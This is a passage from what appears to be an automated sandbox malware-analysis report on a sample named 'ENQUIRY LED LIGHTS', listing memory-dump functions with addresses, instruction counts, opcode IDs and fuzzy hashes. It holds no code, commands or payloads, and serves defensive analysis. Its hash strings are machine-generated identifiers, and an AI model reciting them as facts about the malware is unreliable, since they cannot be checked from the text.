                                                                                                  • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                  • Instruction Fuzzy Hash: E8516C75E00619CFCB14DF98C580AAEF7B2FF84754F2481AAD915A7350E734AE42CB90
                                                                                                  Function 02F16154 Relevance: .1, Instructions: 133COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a55541185894dad23b23890b7365a7263b0e4e2fa457948290bd5d99dd00a2ad
                                                                                                  • Instruction ID: 1de0412aed0f2a195e18503e551f8a939e3e3d00964b58dd049f0bc37479dd55
                                                                                                  • Opcode Fuzzy Hash: a55541185894dad23b23890b7365a7263b0e4e2fa457948290bd5d99dd00a2ad
                                                                                                  • Instruction Fuzzy Hash: 0F51F771E0015ADBDB29DB64CC40BA9B7B6EF01398F1482AAD619E72D1DB359981CF40
                                                                                                  Function 02F10BCD Relevance: .1, Instructions: 130COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: edc842f0e364060d9264968b80b6421e312c5165e414c5abbd8afb625ee8dbe3
                                                                                                  • Instruction ID: 966fd79cd590fd75fb818264f1b7fd98dfb277b13994e2a96b8ca04682feeb5e
                                                                                                  • Opcode Fuzzy Hash: edc842f0e364060d9264968b80b6421e312c5165e414c5abbd8afb625ee8dbe3
                                                                                                  • Instruction Fuzzy Hash: 46418276E002289BCB21DF68CD44FEA77B5EF45790F4100A9EA09AB241DB74DE85CF91
                                                                                                  Function 02FD866E Relevance: .1, Instructions: 129COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                  • Instruction ID: 56f8355a42ffc46c48fda37354b620683e0c93ef20112cdc513a5701e4f9afa5
                                                                                                  • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                  • Instruction Fuzzy Hash: 16418375F00209ABDB15DB99CC84AAFB7BBAF887D4F184069EA05A7341D770DD028B60
                                                                                                  Function 02F10887 Relevance: .1, Instructions: 128COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d707b2d7429f1005daada501f317602a3baa61b3531a130517143ad66724621d
                                                                                                  • Instruction ID: d42fe20094190b02b78f169601fc4a2fbd8e4fd03edcd0d25677e4636f5399a9
                                                                                                  • Opcode Fuzzy Hash: d707b2d7429f1005daada501f317602a3baa61b3531a130517143ad66724621d
                                                                                                  • Instruction Fuzzy Hash: 6941D8716007059FD725CF24C860A26B7F9FF49398B908A6DDA4787754EB30F885CB90
                                                                                                  Function 02F3A470 Relevance: .1, Instructions: 127COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: da19c77239d95473cf8dca4897a7ff7cf01a4d7e64aa79334eba84b68c6bc646
                                                                                                  • Instruction ID: b0687672a7602a0557f749fed4c56c8776c088480b3a5f8256527b6f1fa20fbd
                                                                                                  • Opcode Fuzzy Hash: da19c77239d95473cf8dca4897a7ff7cf01a4d7e64aa79334eba84b68c6bc646
                                                                                                  • Instruction Fuzzy Hash: D441E232A41214CFDB16EF69D990BBE77B1FB483A8F040196DA51AB391DB399900CF64
                                                                                                  Function 02F18BF0 Relevance: .1, Instructions: 124COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5a884459f148b75327adcc57f4092c7b24f952efba082da98e2c83f4fd43ca87
                                                                                                  • Instruction ID: cf60e358d841cd8e0bbcd051d5eb40b77e1f4d7615d875e9604bdc792b700417
                                                                                                  • Opcode Fuzzy Hash: 5a884459f148b75327adcc57f4092c7b24f952efba082da98e2c83f4fd43ca87
                                                                                                  • Instruction Fuzzy Hash: A3410732A02301CBE714EF59C980A7AB7B6FF847C8F54812AEB015B655D779D942CF90
                                                                                                  Function 02F08918 Relevance: .1, Instructions: 123COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 77e0f4dd6f3fbafb8c33b295158c1eac759b03c06df96a140d8dcb106ea30b0c
                                                                                                  • Instruction ID: bd20c663eedf673feada92757f1de75b94aafb1a2db97d10fee49dae43336186
                                                                                                  • Opcode Fuzzy Hash: 77e0f4dd6f3fbafb8c33b295158c1eac759b03c06df96a140d8dcb106ea30b0c
                                                                                                  • Instruction Fuzzy Hash: DB4162729083459ED311DF64C894A6BF7E9EF88BD4F40092AFA84E7190E730DE448B93
                                                                                                  Function 02F0A020 Relevance: .1, Instructions: 122COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                  • Instruction ID: 07d8258121b562de068a4c562d43457fc2c23b497420cf797d7f32ee86dabef7
                                                                                                  • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                  • Instruction Fuzzy Hash: FF410732E00315DFDB10DBA4C484BBEB762EB54BD8F55806AEB45EB291D7318D40DB90
                                                                                                  Function 02F109AD Relevance: .1, Instructions: 122COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f06fdc72d247018dd335606dbfaa9706a3a85b18ebf2551fb82811efd6a8a849
                                                                                                  • Instruction ID: cb588a7820c6e15336f5c28e7e44a1addfc6f3ad58e996dca3ab1c50666f070a
                                                                                                  • Opcode Fuzzy Hash: f06fdc72d247018dd335606dbfaa9706a3a85b18ebf2551fb82811efd6a8a849
                                                                                                  • Instruction Fuzzy Hash: DB417D71A40600EFD721CF18C850B26B7F5FF44794FA0856EEA49CB290EB71E982CB90
                                                                                                  Function 02F40710 Relevance: .1, Instructions: 121COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                  • Instruction ID: f3c1cdba7f6b43903bfbc4d48390158c5eb2142934bddb15818a8630b3ee084c
                                                                                                  • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                  • Instruction Fuzzy Hash: 15410A71A00609EFDB28CF98C980EAABBF5EF08744B10456DE756D7650DB70AA44CF51
                                                                                                  Function 02F1262C Relevance: .1, Instructions: 119COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2fec0a827ec8a1b81a26fda092a656f4c2fe4fc4e429dad969b5e453902cd5c9
                                                                                                  • Instruction ID: c5262c8940b40f788bbb3cc126644e54bbbbe86e5c437146350a8fe98b26d595
                                                                                                  • Opcode Fuzzy Hash: 2fec0a827ec8a1b81a26fda092a656f4c2fe4fc4e429dad969b5e453902cd5c9
                                                                                                  • Instruction Fuzzy Hash: 4341F471A01718CFDB21EFA4D940B6AB7F2FF45394F5082AACA169B6E0DB309941CF41
                                                                                                  Function 02F4C8F9 Relevance: .1, Instructions: 116COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7874614dbe075e77f81d1156e8f871278e4d262bbbd7510dd9d1a0409f765679
                                                                                                  • Instruction ID: b00540fa99c29b487d4151b807de6500f5e8704278418f1d4e4f960a16e9d421
                                                                                                  • Opcode Fuzzy Hash: 7874614dbe075e77f81d1156e8f871278e4d262bbbd7510dd9d1a0409f765679
                                                                                                  • Instruction Fuzzy Hash: B131CBB2A01304EFDB11DF98C540799BBF1FB09798F2080AAD219EB251D772D902CF90
                                                                                                  Function 02F907C3 Relevance: .1, Instructions: 114COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 34c7707cb1464e162e86b13887f07ea6733edb2411bb08cef1fc4fa278e818d2
                                                                                                  • Instruction ID: 53783349e8992c55c38412c1b71a05ad0355cca94039d102fc0659da2f11d5c9
                                                                                                  • Opcode Fuzzy Hash: 34c7707cb1464e162e86b13887f07ea6733edb2411bb08cef1fc4fa278e818d2
                                                                                                  • Instruction Fuzzy Hash: BF417F716043059BE760DF29C844F9BBBE9FF88794F004A2EF698D7250DB709904CB92
                                                                                                  Function 02F905A7 Relevance: .1, Instructions: 111COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c0546e1d91344ee42197abb911c4621b9a4020493afc62da9690b35f9e44ebf0
                                                                                                  • Instruction ID: 510c17fedbeecb4d656e3d77fed7822d79b8c88e81b29f6d424b512cf77e5685
                                                                                                  • Opcode Fuzzy Hash: c0546e1d91344ee42197abb911c4621b9a4020493afc62da9690b35f9e44ebf0
                                                                                                  • Instruction Fuzzy Hash: C341C472A046519FD724DF68C840A6AB3E9FFC8780F04062DFA55D7690EB30E904CBA5
                                                                                                  Function 02F14859 Relevance: .1, Instructions: 111COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d53d7f7004a4e6545679d89ae0e2dfa2c68d289cfbb41e32b3cf5bd607459e45
                                                                                                  • Instruction ID: 4b57e38ecb61c208376d7f41589d7650ee0f07f4f46a52887ccaaba7b5a86bb0
                                                                                                  • Opcode Fuzzy Hash: d53d7f7004a4e6545679d89ae0e2dfa2c68d289cfbb41e32b3cf5bd607459e45
                                                                                                  • Instruction Fuzzy Hash: 6B411370A003018BD724DF28D8A4B2AB7EAFFC13E4F94442DEB558B2A5DB31D851CB91
                                                                                                  Function 02F16EE0 Relevance: .1, Instructions: 107COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7c4982c7d60366b76b0d1cfdcbf3bd12c659f8e19a2f0c1002b7bd7f67cf4324
                                                                                                  • Instruction ID: ddb7b3589977fb5fe2d30a350d39bf1c518851d4ffdeb8adb52b448bc654a451
                                                                                                  • Opcode Fuzzy Hash: 7c4982c7d60366b76b0d1cfdcbf3bd12c659f8e19a2f0c1002b7bd7f67cf4324
                                                                                                  • Instruction Fuzzy Hash: 25416D36B00646EFDB169F29CC84B5ABBAAFF44784F444056EA0587661DB74E820CF90
                                                                                                  Function 02F202E1 Relevance: .1, Instructions: 106COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                  • Instruction ID: 7b1677c4663f8c08de305209d570c9c9ca69f4b5b80b6e771f440df28fe47978
                                                                                                  • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                  • Instruction Fuzzy Hash: D6312833A08254AFDB118B68CC44BAABBFAEF15390F0441AAE955D7351C774D888CBA5
                                                                                                  Function 02FBE3DB Relevance: .1, Instructions: 105COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 511249136fda0415e79e8136695e29f3f39743216f91a2fa954a3957ce451668
                                                                                                  • Instruction ID: a94d74c93a60b735803fb2088f8f87b2e9d8e9ca887ea0fdae492937ade4196f
                                                                                                  • Opcode Fuzzy Hash: 511249136fda0415e79e8136695e29f3f39743216f91a2fa954a3957ce451668
                                                                                                  • Instruction Fuzzy Hash: CB319675740755EBD7279F658D81FEB76A5AF4DB94F400068B700AB2D1DAA4DC00CBA0
                                                                                                  Function 02FC4B4B Relevance: .1, Instructions: 104COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 23a0def8847923d0f5486f0936843a51fae2d2e522e2993ad2db2124c3b2cd9f
                                                                                                  • Instruction ID: 76287196135936c76f516395df155457638696128a0b25a9ec63843eb7570a40
                                                                                                  • Opcode Fuzzy Hash: 23a0def8847923d0f5486f0936843a51fae2d2e522e2993ad2db2124c3b2cd9f
                                                                                                  • Instruction Fuzzy Hash: 8031F432A05212CFC324DF19D9A0E26B7E6FF813A4F16446EEA559B261DB31EC14CF90
                                                                                                  Function 02F14260 Relevance: .1, Instructions: 102COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c5f3bf23600ecac521aef713f3e88af81091e752efb9f1922f9455cf27afaa02
                                                                                                  • Instruction ID: e44cc1261d2d00b8210b412670f8736c298776dd4029f109a7827006bbff9730
                                                                                                  • Opcode Fuzzy Hash: c5f3bf23600ecac521aef713f3e88af81091e752efb9f1922f9455cf27afaa02
                                                                                                  • Instruction Fuzzy Hash: FD41AF32600B459FD722DF24C881BAA77E5AF59394F40846EE75A8B250DB74E844CB50
                                                                                                  Function 02FC4BB0 Relevance: .1, Instructions: 101COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 02d294e0556f2bdbf25c5d1a495c79ac204417157458fa72555a469e18419030
                                                                                                  • Instruction ID: fe9de8cc7d15e0e556ac9ccf51579730ca33eb1f78d12d551118e9abbec1c32d
                                                                                                  • Opcode Fuzzy Hash: 02d294e0556f2bdbf25c5d1a495c79ac204417157458fa72555a469e18419030
                                                                                                  • Instruction Fuzzy Hash: 2131A171B052028FC324DF28C9A0E6AB3E6FB84794F15456DEA559B365D730EC14CB61
                                                                                                  Function 02F8EB1D Relevance: .1, Instructions: 100COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0374a959c0eee5908109de1d85b09e6b94b9a932e6c8fff7ca862cdc23bc9667
                                                                                                  • Instruction ID: 393493caa5fad8137fad9c6bc326f942a2fdfc4e8e5042ee589b985be338c0cf
                                                                                                  • Opcode Fuzzy Hash: 0374a959c0eee5908109de1d85b09e6b94b9a932e6c8fff7ca862cdc23bc9667
                                                                                                  • Instruction Fuzzy Hash: 7D31E472B016859BE3226758CD48B65F7D9FF427C8F1D00B0BB468B6E2DB28D840C610
                                                                                                  Function 02FD61C3 Relevance: .1, Instructions: 97COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cde29cfa6ece625a764d94ccd895a51c504b222a686d2f10d695ac410c292cf1
                                                                                                  • Instruction ID: a1cd251cc95d4b480b7a95ad24b155f0048e53e83eb455fe5d7e7c427b176ab8
                                                                                                  • Opcode Fuzzy Hash: cde29cfa6ece625a764d94ccd895a51c504b222a686d2f10d695ac410c292cf1
                                                                                                  • Instruction Fuzzy Hash: 2631E475E00129ABDB15DF98DC40FAEB7BAEB48B84F454168EA00EB244D770ED40CBA4
                                                                                                  Function 02F3EB20 Relevance: .1, Instructions: 96COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c0b716e7dc4a07b3d40c77401df00c16141ef0bd372dc45cba9aa64f8a2bc525
                                                                                                  • Instruction ID: 906809dde0caf4dc9e29260cd3a9f211ffc66d48cc6f3bcd7330980b94470deb
                                                                                                  • Opcode Fuzzy Hash: c0b716e7dc4a07b3d40c77401df00c16141ef0bd372dc45cba9aa64f8a2bc525
                                                                                                  • Instruction Fuzzy Hash: BF318672E01214AFDB22DFA9CC40BAEB7F9EF48790F114566EA16D7250D7709A00CB90
                                                                                                  Function 02FB483A Relevance: .1, Instructions: 96COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 67bceada8c643d8cf1103c82cc895a5660055c59a40eb81517b11efb259498ef
                                                                                                  • Instruction ID: 33f4de120ea184f9490db76fce4f953d0bd9c464b466ab0f35fe03d2de08945b
                                                                                                  • Opcode Fuzzy Hash: 67bceada8c643d8cf1103c82cc895a5660055c59a40eb81517b11efb259498ef
                                                                                                  • Instruction Fuzzy Hash: 2A315276A4012CABCF22DF55DD94BDE77B6BF88390F1000A5A608A7251CB30DE918F90
                                                                                                  Function 02FD60B8 Relevance: .1, Instructions: 95COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9ab4430d9e641cafef010b8030787a451557efb5e34bfac6abeabf834a85ef45
                                                                                                  • Instruction ID: 1786bb4251c9f3a459e7a1b4f84c779aad60213ecb88ff29ed0001353036fbb4
                                                                                                  • Opcode Fuzzy Hash: 9ab4430d9e641cafef010b8030787a451557efb5e34bfac6abeabf834a85ef45
                                                                                                  • Instruction Fuzzy Hash: 0D31A472B00615AFE7129F69DC50B6EB7AFAF45B94F084069E705EB382DB30DD018B90
                                                                                                  Function 02F107AF Relevance: .1, Instructions: 95COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c9981d9d0b629f0cf8cdea9859a08c4d13989298b82133614b61dde63b0bb3e8
                                                                                                  • Instruction ID: 037e5fd514679416bb15a5ba53ba2faa946dcb5cc6a15941d03536004a3396f0
                                                                                                  • Opcode Fuzzy Hash: c9981d9d0b629f0cf8cdea9859a08c4d13989298b82133614b61dde63b0bb3e8
                                                                                                  • Instruction Fuzzy Hash: 1D31BF32A08651DBC712EE248880E6BB7A6EF947E0F41452DFE59A7250DE30DC51DBE1
                                                                                                  Function 02F18550 Relevance: .1, Instructions: 94COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a5fb268351095fb9544dd623a31f2073f9ba36c570cb528334003484462babc4
                                                                                                  • Instruction ID: 0360c449004b152bb66d766807d41c2e9d383d0bab288c01c5b5ffa22fd68ebc
                                                                                                  • Opcode Fuzzy Hash: a5fb268351095fb9544dd623a31f2073f9ba36c570cb528334003484462babc4
                                                                                                  • Instruction Fuzzy Hash: 8B31AF72A093018FE720CF19C940B2AB7E5FF88B94F45496EFA8597390D770E844CBA1
                                                                                                  Function 02F4A6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
